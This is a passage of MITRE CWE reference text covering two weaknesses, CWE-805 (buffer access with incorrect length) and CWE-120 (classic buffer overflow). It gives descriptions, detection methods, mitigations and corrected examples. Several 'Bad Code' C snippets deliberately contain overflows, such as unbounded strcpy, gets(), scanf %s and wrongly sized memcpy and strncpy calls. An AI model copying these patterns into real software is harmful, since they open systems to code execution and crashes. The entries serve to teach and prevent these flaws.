2012-05-11 | CWE Content Team | MITRE | Internal: updated Demonstrative_Examples, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings
2012-10-30 | CWE Content Team | MITRE | Internal: updated Potential_Mitigations
2014-02-18 | CWE Content Team | MITRE | Internal: updated Related_Attack_Patterns
2014-06-23 | CWE Content Team | MITRE | Internal: updated Related_Attack_Patterns
2014-07-30 | CWE Content Team | MITRE | Internal: updated Relationships
2015-12-07 | CWE Content Team | MITRE | Internal: updated Related_Attack_Patterns
2017-05-03 | CWE Content Team | MITRE | Internal: updated Related_Attack_Patterns

CWE-805: Buffer Access with Incorrect Length Value

Weakness ID: 805
Abstraction: Base
Status: Incomplete
+ Description

Description Summary

The software uses a sequential operation to read or write a buffer, but it uses an incorrect length value that causes it to access memory that is outside of the bounds of the buffer.

Extended Description

When the length value exceeds the size of the destination, a buffer overflow could occur.

+ Time of Introduction
  • Implementation
+ Applicable Platforms

Languages

C: (Often)

C++: (Often)

Assembly

+ Common Consequences
Scope | Effect
Integrity
Confidentiality
Availability

Technical Impact: Execute unauthorized code or commands

Buffer overflows often can be used to execute arbitrary code, which is usually outside the scope of a program's implicit security policy. This can often be used to subvert any other security service.

Availability

Technical Impact: DoS: crash / exit / restart; DoS: resource consumption (CPU)

Buffer overflows generally lead to crashes. Other attacks leading to lack of availability are possible, including putting the program into an infinite loop.

+ Likelihood of Exploit

Medium to High

+ Detection Methods

Automated Static Analysis

This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives.

Automated static analysis generally does not account for environmental considerations when reporting out-of-bounds memory operations. This can make it difficult for users to determine which warnings should be investigated first. For example, an analysis tool might report buffer overflows that originate from command line arguments in a program that is not expected to run with setuid or other special privileges.

Effectiveness: High

Detection techniques for buffer-related errors are more mature than for most other weakness types.

Automated Dynamic Analysis

This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results.

Effectiveness: Moderate

Without visibility into the code, black box methods may not be able to sufficiently distinguish this weakness from others, requiring manual methods to diagnose the underlying problem.

Manual Analysis

Manual analysis can be useful for finding this weakness, but it might not achieve desired code coverage within limited time constraints. This becomes difficult for weaknesses that must be considered for all inputs, since the attack surface can be too large.

+ Demonstrative Examples

Example 1

This example takes an IP address from a user, verifies that it is well formed and then looks up the hostname and copies it into a buffer.

(Bad Code)
Example Language: C
#include <netdb.h>
#include <arpa/inet.h>
#include <string.h>

void host_lookup(char *user_supplied_addr){
    struct hostent *hp;
    in_addr_t addr;
    char hostname[64];

    /* routine that ensures user_supplied_addr is in the right format for conversion */
    validate_addr_form(user_supplied_addr);
    addr = inet_addr(user_supplied_addr);
    hp = gethostbyaddr((const char *) &addr, sizeof(addr), AF_INET);
    /* the resolved name may be longer than 64 bytes, but it is copied with no bound */
    strcpy(hostname, hp->h_name);
}

This function allocates a buffer of 64 bytes to store the hostname under the assumption that the maximum length of a hostname is 64 bytes; however, there is no guarantee that the hostname will not be larger than 64 bytes. If an attacker specifies an address which resolves to a very large hostname, then the function may overwrite sensitive data or even relinquish control flow to the attacker.

Note that this example also contains an unchecked return value (CWE-252) that can lead to a NULL pointer dereference (CWE-476).
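A corrected version bounds the copy and checks the lookup result. This is a sketch: it reuses the validate_addr_form() helper from the example and simply truncates names longer than the buffer, which may or may not be acceptable for a given application.

(Good Code)
Example Language: C
void host_lookup(char *user_supplied_addr){
    struct hostent *hp;
    in_addr_t addr;
    char hostname[64];

    validate_addr_form(user_supplied_addr);
    addr = inet_addr(user_supplied_addr);
    hp = gethostbyaddr((const char *) &addr, sizeof(addr), AF_INET);
    if (hp == NULL) {
        /* lookup failed: handle the error instead of dereferencing NULL (CWE-476) */
        return;
    }
    /* copy at most sizeof(hostname) - 1 bytes and always NUL-terminate */
    strncpy(hostname, hp->h_name, sizeof(hostname) - 1);
    hostname[sizeof(hostname) - 1] = '\0';
}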

Example 2

In the following example, it is possible to request that memcpy move a much larger segment of memory than assumed:

(Bad Code)
Example Language: C
int returnChunkSize(void *chunk) {
    /* if chunk info is valid, return the size of usable memory,
     * else, return -1 to indicate an error
     */
    ...
}

int main() {
    ...
    memcpy(destBuf, srcBuf, (returnChunkSize(destBuf) - 1));
    ...
}

If returnChunkSize() happens to encounter an error it will return -1. Notice that the return value is not checked before the memcpy operation (CWE-252), so -1 can be passed as the size argument to memcpy() (CWE-805). Because memcpy() assumes that the value is unsigned, it will be interpreted as MAXINT-1 (CWE-195), and therefore will copy far more memory than is likely available to the destination buffer (CWE-787, CWE-788).
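A safer variant checks both the return value and the size before copying. This is a sketch; DEST_BUF_SIZE is an illustrative constant standing in for the real capacity of destBuf, which the example leaves unspecified.

(Good Code)
Example Language: C
int main() {
    ...
    int size = returnChunkSize(destBuf);
    /* reject the error value (-1) and any size larger than the destination can hold */
    if (size <= 0 || (size_t) size > DEST_BUF_SIZE) {
        /* handle the error; do not call memcpy */
    }
    else {
        memcpy(destBuf, srcBuf, (size_t) size);
    }
    ...
}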

Example 3

In the following example, the source character string is copied to the dest character string using the method strncpy.

(Bad Code)
Example Languages: C and C++ 
...
char source[21] = "the character string";
char dest[12];
strncpy(dest, source, sizeof(source)-1);
...

However, in the call to strncpy the source character string is used within the sizeof call to determine the number of characters to copy. This will create a buffer overflow because the size of the source character string is greater than the size of the dest character string. The dest character string should be used within the sizeof call to ensure that the correct number of characters is copied, as shown below.

(Good Code)
Example Languages: C and C++ 
...
char source[21] = "the character string";
char dest[12];
strncpy(dest, source, sizeof(dest)-1);
dest[sizeof(dest)-1] = '\0'; /* strncpy does not NUL-terminate when it truncates */
...

Example 4

In this example, the method outputFilenameToLog outputs a filename to a log file. The method arguments include a pointer to a character string containing the file name and an integer for the number of characters in the string. The filename is copied to a buffer where the buffer size is set to a maximum size for inputs to the log file. The method then calls another method to save the contents of the buffer to the log file.

(Bad Code)
Example Languages: C and C++ 
#define LOG_INPUT_SIZE 40

// saves the file name to a log file
int outputFilenameToLog(char *filename, int length) {
int success;

// buffer with size set to maximum size for input to log file
char buf[LOG_INPUT_SIZE];

// copy filename to buffer
strncpy(buf, filename, length);

// save to log file
success = saveToLogFile(buf);

return success;
}

However, in this case the string copy method, strncpy, mistakenly uses the length method argument to determine the number of characters to copy rather than using the size of the local character string, buf. This can lead to a buffer overflow if the number of characters in the string pointed to by filename is larger than the number of characters allowed in the local character string. The string copy method should use the buf character string within a sizeof call to ensure that only characters up to the size of the buf array are copied, avoiding a buffer overflow, as shown below.

(Good Code)
Example Languages: C and C++ 
...
// copy filename to buffer, leaving room for the terminator
strncpy(buf, filename, sizeof(buf)-1);
buf[sizeof(buf)-1] = '\0'; // strncpy does not NUL-terminate when it truncates
...
+ Observed Examples
Reference | Description
Chain: large length value causes buffer over-read (CWE-126)
Use of packet length field to make a calculation, then copy into a fixed-size buffer
Chain: retrieval of length value from an uninitialized memory location
Crafted length value in document reader leads to buffer overflow
SSL server overflow when the sum of multiple length fields exceeds a given value
Language interpreter API function doesn't validate length argument, leading to information exposure
+ Potential Mitigations

Phase: Requirements

Strategy: Language Selection

Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

For example, many languages that perform their own memory management, such as Java and Perl, are not subject to buffer overflows. Other languages, such as Ada and C#, typically provide overflow protection, but the protection can be disabled by the programmer.

Be wary that a language's interface to native code may still be subject to overflows, even if the language itself is theoretically safe.

Phase: Architecture and Design

Strategy: Libraries or Frameworks

Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

Examples include the Safe C String Library (SafeStr) by Messier and Viega [R.805.6], and the Strsafe.h library from Microsoft [R.805.7]. These libraries provide safer versions of overflow-prone string-handling functions.

This is not a complete solution, since many buffer overflows are not related to strings.

Phase: Build and Compilation

Strategy: Compilation or Build Hardening

Run or compile the software using features or extensions that automatically provide a protection mechanism that mitigates or eliminates buffer overflows.

For example, certain compilers and extensions provide automatic buffer overflow detection mechanisms that are built into the compiled code. Examples include the Microsoft Visual Studio /GS flag, Fedora/Red Hat FORTIFY_SOURCE GCC flag, StackGuard, and ProPolice.

Effectiveness: Defense in Depth

This is not necessarily a complete solution, since these mechanisms can only detect certain types of overflows. In addition, an attack could still cause a denial of service, since the typical response is to exit the application.

Phase: Implementation

Consider adhering to the following rules when allocating and managing an application's memory:

  • Double check that your buffer is as large as you specify.

  • When using functions that accept a number of bytes to copy, such as strncpy(), be aware that if the destination buffer size is equal to the source buffer size, it may not NULL-terminate the string (see the sketch after this list).

  • Check buffer boundaries if accessing the buffer in a loop and make sure you are not in danger of writing past the allocated space.

  • If necessary, truncate all input strings to a reasonable length before passing them to the copy and concatenation functions.

Phase: Architecture and Design

For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

Phase: Operation

Strategy: Environment Hardening

Run or compile the software using features or extensions that randomly arrange the positions of a program's executable and libraries in memory. Because this makes the addresses unpredictable, it can prevent an attacker from reliably jumping to exploitable code.

Examples include Address Space Layout Randomization (ASLR) [R.805.2] [R.805.4] and Position-Independent Executables (PIE) [R.805.10].

Effectiveness: Defense in Depth

This is not a complete solution. However, it forces the attacker to guess an unknown value that changes every program execution. In addition, an attack could still cause a denial of service, since the typical response is to exit the application.

Phase: Operation

Strategy: Environment Hardening

Use a CPU and operating system that offers Data Execution Protection (NX) or its equivalent [R.805.3] [R.805.8].

Effectiveness: Defense in Depth

This is not a complete solution, since buffer overflows could be used to overwrite nearby variables to modify the software's state in dangerous ways. In addition, it cannot be used in cases in which self-modifying code is required. Finally, an attack could still cause a denial of service, since the typical response is to exit the application.

Phases: Architecture and Design; Operation

Strategy: Environment Hardening

Run your code using the lowest privileges that are required to accomplish the necessary tasks [R.805.9]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations.

Phases: Architecture and Design; Operation

Strategy: Sandbox or Jail

Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.

OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.

This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.

Be careful to avoid CWE-243 and other weaknesses related to jails.

Effectiveness: Limited

The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed.

+ Weakness Ordinalities
Ordinality | Description
Resultant
(where the weakness is typically related to the presence of some other weaknesses)
Primary
(where the weakness exists independent of other weaknesses)
+ Relationships
Nature | Type | ID | Name | View(s) this relationship pertains to
ChildOfWeakness ClassWeakness Class119Improper Restriction of Operations within the Bounds of a Memory Buffer
Development Concepts (primary)699
Research Concepts (primary)1000
ChildOfCategoryCategory740CERT C Secure Coding Section 06 - Arrays (ARR)
Weaknesses Addressed by the CERT C Secure Coding Standard (primary)734
ChildOfCategoryCategory8022010 Top 25 - Risky Resource Management
Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors (primary)800
ChildOfCategoryCategory8672011 Top 25 - Weaknesses On the Cusp
Weaknesses in the 2011 CWE/SANS Top 25 Most Dangerous Software Errors (primary)900
ChildOfCategoryCategory874CERT C++ Secure Coding Section 06 - Arrays and the STL (ARR)
Weaknesses Addressed by the CERT C++ Secure Coding Standard (primary)868
ParentOfWeakness VariantWeakness Variant806Buffer Access Using Size of Source Buffer
Development Concepts (primary)699
Research Concepts (primary)1000
MemberOfViewView884CWE Cross-section
CWE Cross-section (primary)884
CanFollowWeakness BaseWeakness Base130Improper Handling of Length Parameter Inconsistency
Research Concepts1000
+ Affected Resources
  • Memory
+ Causal Nature

Explicit

+ Taxonomy Mappings
Mapped Taxonomy Name | Node ID | Fit | Mapped Node Name
CERT C++ Secure CodingARR33-CPPGuarantee that copies are made into storage of sufficient size
CERT C Secure CodingARR33-CGuarantee that copies are made into storage of sufficient size
+ References
[R.805.1] [REF-11] M. Howard and D. LeBlanc. "Writing Secure Code". Chapter 6, "Why ACLs Are Important" Page 171. 2nd Edition. Microsoft. 2002.
[R.805.2] [REF-22] Michael Howard. "Address Space Layout Randomization in Windows Vista". <http://blogs.msdn.com/michael_howard/archive/2006/05/26/address-space-layout-randomization-in-windows-vista.aspx>.
[R.805.3] Arjan van de Ven. "Limiting buffer overflows with ExecShield". <http://www.redhat.com/magazine/009jul05/features/execshield/>.
[R.805.4] [REF-29] "PaX". <http://en.wikipedia.org/wiki/PaX>.
[R.805.5] Jason Lam. "Top 25 Series - Rank 12 - Buffer Access with Incorrect Length Value". SANS Software Security Institute. 2010-03-11. <http://blogs.sans.org/appsecstreetfighter/2010/03/11/top-25-series-rank-12-buffer-access-with-incorrect-length-value/>.
[R.805.6] [REF-26] Matt Messier and John Viega. "Safe C String Library v1.0.3". <http://www.zork.org/safestr/>.
[R.805.7] [REF-27] Microsoft. "Using the Strsafe.h Functions". <http://msdn.microsoft.com/en-us/library/ms647466.aspx>.
[R.805.8] [REF-25] Microsoft. "Understanding DEP as a mitigation technology part 1". <http://blogs.technet.com/b/srd/archive/2009/06/12/understanding-dep-as-a-mitigation-technology-part-1.aspx>.
[R.805.9] [REF-31] Sean Barnum and Michael Gegick. "Least Privilege". 2005-09-14. <https://buildsecurityin.us-cert.gov/daisy/bsi/articles/knowledge/principles/351.html>.
[R.805.10] [REF-37] Grant Murphy. "Position Independent Executables (PIE)". Red Hat. 2012-11-28. <https://securityblog.redhat.com/2012/11/28/position-independent-executables-pie/>.
+ Content History
Submissions
Submission Date | Submitter | Organization | Source
2010-01-15MITREInternal CWE Team
Modifications
Modification Date | Modifier | Organization | Source
2010-04-05CWE Content TeamMITREInternal
updated Related_Attack_Patterns
2010-06-21CWE Content TeamMITREInternal
updated Common_Consequences, Potential_Mitigations, References
2010-09-27CWE Content TeamMITREInternal
updated Potential_Mitigations
2010-12-13CWE Content TeamMITREInternal
updated Potential_Mitigations
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences
2011-06-27CWE Content TeamMITREInternal
updated Demonstrative_Examples, Observed_Examples, Relationships
2011-09-13CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2012-05-11CWE Content TeamMITREInternal
updated Potential_Mitigations, References, Relationships
2012-10-30CWE Content TeamMITREInternal
updated Potential_Mitigations
2014-02-18CWE Content TeamMITREInternal
updated Potential_Mitigations, References
2014-06-23CWE Content TeamMITREInternal
updated Demonstrative_Examples

CWE-120: Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')

Weakness ID: 120
Abstraction: Base
Status: Incomplete
+ Description

Description Summary

The program copies an input buffer to an output buffer without verifying that the size of the input buffer is less than the size of the output buffer, leading to a buffer overflow.

Extended Description

A buffer overflow condition exists when a program attempts to put more data in a buffer than it can hold, or when a program attempts to put data in a memory area outside of the boundaries of a buffer. The simplest type of error, and the most common cause of buffer overflows, is the "classic" case in which the program copies the buffer without restricting how much is copied. Other variants exist, but the existence of a classic overflow strongly suggests that the programmer is not considering even the most basic of security protections.

+ Alternate Terms
buffer overrun:

Some prominent vendors and researchers use the term "buffer overrun," but most people use "buffer overflow."

Unbounded Transfer
+ Terminology Notes

Many issues that are now called "buffer overflows" are substantively different than the "classic" overflow, including entirely different bug types that rely on overflow exploit techniques, such as integer signedness errors, integer overflows, and format string bugs. This imprecise terminology can make it difficult to determine which variant is being reported.

+ Time of Introduction
  • Implementation
+ Applicable Platforms

Languages

C

C++

Assembly

+ Common Consequences
Scope | Effect
Integrity
Confidentiality
Availability

Technical Impact: Execute unauthorized code or commands

Buffer overflows often can be used to execute arbitrary code, which is usually outside the scope of a program's implicit security policy. This can often be used to subvert any other security service.

Availability

Technical Impact: DoS: crash / exit / restart; DoS: resource consumption (CPU)

Buffer overflows generally lead to crashes. Other attacks leading to lack of availability are possible, including putting the program into an infinite loop.

+ Likelihood of Exploit

High to Very High

+ Detection Methods

Automated Static Analysis

This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives.

Automated static analysis generally does not account for environmental considerations when reporting out-of-bounds memory operations. This can make it difficult for users to determine which warnings should be investigated first. For example, an analysis tool might report buffer overflows that originate from command line arguments in a program that is not expected to run with setuid or other special privileges.

Effectiveness: High

Detection techniques for buffer-related errors are more mature than for most other weakness types.

Automated Dynamic Analysis

This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results.

Manual Analysis

Manual analysis can be useful for finding this weakness, but it might not achieve desired code coverage within limited time constraints. This becomes difficult for weaknesses that must be considered for all inputs, since the attack surface can be too large.

Automated Static Analysis - Binary / Bytecode

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Bytecode Weakness Analysis - including disassembler + source code weakness analysis

  • Binary Weakness Analysis - including disassembler + source code weakness analysis

Effectiveness: SOAR High

Manual Static Analysis - Binary / Bytecode

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies

Effectiveness: SOAR Partial

Dynamic Analysis with automated results interpretation

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Web Application Scanner

  • Web Services Scanner

  • Database Scanners

Effectiveness: SOAR Partial

Dynamic Analysis with manual results interpretation

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Fuzz Tester

  • Framework-based Fuzzer

Effectiveness: SOAR Partial

Manual Static Analysis - Source Code

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Focused Manual Spotcheck - Focused manual analysis of source

  • Manual Source Code Review (not inspections)

Effectiveness: SOAR Partial

Automated Static Analysis - Source Code

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Source code Weakness Analyzer

  • Context-configured Source Code Weakness Analyzer

Effectiveness: SOAR High

Architecture / Design Review

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Formal Methods / Correct-By-Construction

Cost effective for partial coverage:

  • Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)

Effectiveness: SOAR High

+ Demonstrative Examples

Example 1

The following code asks the user to enter their last name and then attempts to store the value entered in the last_name array.

(Bad Code)
Example Language: C
char last_name[20];
printf ("Enter your last name: ");
scanf ("%s", last_name);

The problem with the code above is that it does not restrict or limit the size of the name entered by the user. If the user enters "Very_very_long_last_name", which is 24 characters long, a buffer overflow will occur, since the array can hold only 19 characters plus the terminating null byte.
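
One possible fix, sketched below as an illustration rather than as part of this entry, is to give scanf() a field width so that it stops storing characters before the array is full.

#include <stdio.h>

int main(void) {
    char last_name[20];

    printf("Enter your last name: ");
    /* "%19s" tells scanf to store at most 19 characters plus the
       terminating null byte, so the 20-byte array cannot overflow. */
    if (scanf("%19s", last_name) == 1) {
        printf("Hello, %s\n", last_name);
    }
    return 0;
}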

Example 2

The following code attempts to create a local copy of a buffer to perform some manipulations to the data.

(Bad Code)
Example Language: C
void manipulate_string(char* string){
char buf[24];
strcpy(buf, string);
...
}

However, the programmer does not ensure that the size of the data pointed to by string will fit in the local buffer and blindly copies the data with the potentially dangerous strcpy() function. This may result in a buffer overflow condition if an attacker can influence the contents of the string parameter.
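
One possible repair, shown below as an illustrative sketch only, is to replace strcpy() with snprintf(), which bounds the copy by the destination size and always null-terminates.

#include <stdio.h>

/* Illustrative rewrite of the example above: the copy is bounded by the
   size of the local buffer, so an oversized input is truncated rather
   than overflowing buf. */
void manipulate_string(const char *string) {
    char buf[24];

    /* snprintf writes at most sizeof(buf)-1 characters plus a null byte. */
    snprintf(buf, sizeof(buf), "%s", string);

    /* ... operate on the bounded local copy ... */
    printf("local copy: %s\n", buf);
}

int main(void) {
    manipulate_string("a caller-supplied string that might be longer than 24 characters");
    return 0;
}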

Example 3

The excerpt below calls the gets() function in C, which is inherently unsafe.

(Bad Code)
Example Language: C
char buf[24];
printf("Please enter your name and press <Enter>\n");
gets(buf);
...
}

However, the gets() function blindly copies all input from STDIN into the buffer without restricting how much is copied. This allows the user to provide a string that is larger than the buffer, resulting in an overflow condition.
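
An illustrative replacement, not taken from this entry, is to read the line with fgets(), which accepts the buffer size and never writes past it.

#include <stdio.h>
#include <string.h>

int main(void) {
    char buf[24];

    printf("Please enter your name and press <Enter>\n");
    /* fgets reads at most sizeof(buf)-1 characters and null-terminates,
       so the caller controls how much of STDIN ends up in buf. */
    if (fgets(buf, sizeof(buf), stdin) != NULL) {
        buf[strcspn(buf, "\n")] = '\0';   /* strip the trailing newline, if any */
        printf("Hello, %s\n", buf);
    }
    return 0;
}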

Example 4

In the following example, a server accepts connections from a client and processes the client request. After accepting a client connection, the program obtains the client information using the gethostbyaddr() function, copies the hostname of the connected client into a local variable, and writes the hostname to a log file.

(Bad Code)
Example Languages: C and C++ 
...
struct hostent *clienthp;
char hostname[MAX_LEN];
struct sockaddr_in clientaddr;

// create server socket, bind to server address and listen on socket
...

// accept client connections and process requests
int count = 0;
for (count = 0; count < MAX_CONNECTIONS; count++) {

socklen_t clientlen = sizeof(struct sockaddr_in);
int clientsocket = accept(serversocket, (struct sockaddr *)&clientaddr, &clientlen);

if (clientsocket >= 0) {
clienthp = gethostbyaddr((char*) &clientaddr.sin_addr.s_addr, sizeof(clientaddr.sin_addr.s_addr), AF_INET);
strcpy(hostname, clienthp->h_name);
logOutput("Accepted client connection from host ", hostname);

// process client request
...
close(clientsocket);
}
}
close(serversocket);
...

However, the hostname of the client that connected may be longer than the allocated size of the local hostname variable. This results in a buffer overflow when the client hostname is copied to the local variable using the strcpy() function.
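
One way to bound this copy, sketched below with an illustrative helper and a stand-in MAX_LEN value, is to limit the number of copied characters to the size of the destination and to write the null terminator explicitly, since strncpy() does not add one when the source is too long.

#include <stdio.h>
#include <string.h>

#define MAX_LEN 64   /* stands in for the MAX_LEN used by the example above */

/* Copy an untrusted hostname into a fixed-size buffer without overflowing it. */
static void copy_hostname(char *dest, size_t dest_size, const char *src) {
    strncpy(dest, src, dest_size - 1);   /* bounded by the destination size */
    dest[dest_size - 1] = '\0';          /* strncpy may not null-terminate */
}

int main(void) {
    char hostname[MAX_LEN];
    const char *untrusted = "a.very.long.hostname.that.might.exceed.the.buffer.example.org";

    copy_hostname(hostname, sizeof(hostname), untrusted);
    printf("logged host: %s\n", hostname);
    return 0;
}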

+ Observed Examples
Reference | Description
buffer overflow using command with long argument
buffer overflow in local program using long environment variable
buffer overflow in comment characters, when product increments a counter for a ">" but does not decrement for "<"
By replacing a valid cookie value with an extremely long string of characters, an attacker may overflow the application's buffers.
By replacing a valid cookie value with an extremely long string of characters, an attacker may overflow the application's buffers.
+ Potential Mitigations

Phase: Requirements

Strategy: Language Selection

Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

For example, many languages that perform their own memory management, such as Java and Perl, are not subject to buffer overflows. Other languages, such as Ada and C#, typically provide overflow protection, but the protection can be disabled by the programmer.

Be wary that a language's interface to native code may still be subject to overflows, even if the language itself is theoretically safe.

Phase: Architecture and Design

Strategy: Libraries or Frameworks

Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

Examples include the Safe C String Library (SafeStr) by Messier and Viega [R.120.4], and the Strsafe.h library from Microsoft [R.120.3]. These libraries provide safer versions of overflow-prone string-handling functions.

This is not a complete solution, since many buffer overflows are not related to strings.

Phase: Build and Compilation

Strategy: Compilation or Build Hardening

Run or compile the software using features or extensions that automatically provide a protection mechanism that mitigates or eliminates buffer overflows.

For example, certain compilers and extensions provide automatic buffer overflow detection mechanisms that are built into the compiled code. Examples include the Microsoft Visual Studio /GS flag, Fedora/Red Hat FORTIFY_SOURCE GCC flag, StackGuard, and ProPolice.

Effectiveness: Defense in Depth

This is not necessarily a complete solution, since these mechanisms can only detect certain types of overflows. In addition, an attack could still cause a denial of service, since the typical response is to exit the application.

Phase: Implementation

Consider adhering to the following rules when allocating and managing an application's memory:

  • Double check that your buffer is as large as you specify.

  • When using functions that accept a number of bytes to copy, such as strncpy(), be aware that if the destination buffer size is equal to the source buffer size, it may not NULL-terminate the string.

  • Check buffer boundaries if accessing the buffer in a loop and make sure you are not in danger of writing past the allocated space.

  • If necessary, truncate all input strings to a reasonable length before passing them to the copy and concatenation functions.

Phase: Implementation

Strategy: Input Validation

Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a whitelist of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.

When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."

Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a blacklist). A blacklist is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, blacklists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
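
As a concrete illustration of the "accept known good" strategy, the sketch below (its length limit and character set are invented for the example) rejects any input that is too long or contains characters outside an explicit allow-list before the value is used.

#include <stdio.h>
#include <string.h>

#define MAX_NAME_LEN 19   /* illustrative limit chosen for this sketch */

/* Return 1 if the input consists only of ASCII letters and is short enough
   to fit the fixed-size buffers used later; return 0 otherwise. */
static int is_valid_name(const char *input) {
    size_t len = strlen(input);
    if (len == 0 || len > MAX_NAME_LEN) {
        return 0;
    }
    for (size_t i = 0; i < len; i++) {
        char c = input[i];
        if (!((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z'))) {
            return 0;   /* anything outside the allow-list is rejected */
        }
    }
    return 1;
}

int main(void) {
    printf("%d\n", is_valid_name("Smith"));     /* 1: accepted */
    printf("%d\n", is_valid_name("Sm1th;rm"));  /* 0: rejected */
    return 0;
}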

Phase: Architecture and Design

For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

Phase: Operation

Strategy: Environment Hardening

Run or compile the software using features or extensions that randomly arrange the positions of a program's executable and libraries in memory. Because this makes the addresses unpredictable, it can prevent an attacker from reliably jumping to exploitable code.

Examples include Address Space Layout Randomization (ASLR) [R.120.5] [R.120.7] and Position-Independent Executables (PIE) [R.120.14].

Effectiveness: Defense in Depth

This is not a complete solution. However, it forces the attacker to guess an unknown value that changes every program execution. In addition, an attack could still cause a denial of service, since the typical response is to exit the application.

Phase: Operation

Strategy: Environment Hardening

Use a CPU and operating system that offers Data Execution Protection (NX) or its equivalent [R.120.7] [R.120.9].

Effectiveness: Defense in Depth

This is not a complete solution, since buffer overflows could be used to overwrite nearby variables to modify the software's state in dangerous ways. In addition, it cannot be used in cases in which self-modifying code is required. Finally, an attack could still cause a denial of service, since the typical response is to exit the application.

Phases: Build and Compilation; Operation

Most mitigating technologies at the compiler or OS level to date address only a subset of buffer overflow problems and rarely provide complete protection against even that subset. It is good practice to implement strategies that increase the attacker's workload, such as requiring the attacker to guess an unknown value that changes every program execution.

Phase: Implementation

Replace unbounded copy functions with analogous functions that support length arguments, such as strcpy with strncpy. Create these if they are not available.

Effectiveness: Moderate

This approach is still susceptible to calculation errors, including issues such as off-by-one errors (CWE-193) and incorrectly calculating buffer lengths (CWE-131).
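
On platforms that lack a bounded, always-terminating copy routine, a small wrapper can centralize the length arithmetic so that off-by-one mistakes are confined to one place. The sketch below is illustrative only; the safe_strcpy name and its return convention are not part of this entry.

#include <stdio.h>
#include <string.h>

/* Bounded copy that always null-terminates and reports truncation.
   Returns 0 on success, -1 if the source had to be truncated. */
static int safe_strcpy(char *dest, size_t dest_size, const char *src) {
    size_t src_len = strlen(src);

    if (dest_size == 0) {
        return -1;
    }
    if (src_len >= dest_size) {
        memcpy(dest, src, dest_size - 1);   /* leave room for the terminator */
        dest[dest_size - 1] = '\0';
        return -1;                          /* truncated */
    }
    memcpy(dest, src, src_len + 1);         /* includes the null terminator */
    return 0;
}

int main(void) {
    char buf[8];
    printf("%d %s\n", safe_strcpy(buf, sizeof(buf), "short"), buf);
    printf("%d %s\n", safe_strcpy(buf, sizeof(buf), "much too long"), buf);
    return 0;
}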

Phase: Architecture and Design

Strategy: Enforcement by Conversion

When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.
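
A minimal sketch of this strategy follows; the table contents are invented for illustration. The caller supplies a small numeric ID, anything outside the table is rejected, and no attacker-controlled string ever reaches the file APIs.

#include <stdio.h>

/* Fixed mapping from numeric IDs to the only filenames the program will open. */
static const char *const report_files[] = {
    "daily.txt",
    "weekly.txt",
    "monthly.txt",
};

/* Return the filename for a valid ID, or NULL for any other input. */
static const char *lookup_report(int id) {
    if (id < 0 || id >= (int)(sizeof(report_files) / sizeof(report_files[0]))) {
        return NULL;
    }
    return report_files[id];
}

int main(void) {
    printf("%s\n", lookup_report(1));                       /* "weekly.txt" */
    printf("%s\n", lookup_report(7) ? "ok" : "rejected");   /* "rejected" */
    return 0;
}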

Phases: Architecture and Design; Operation

Strategy: Environment Hardening

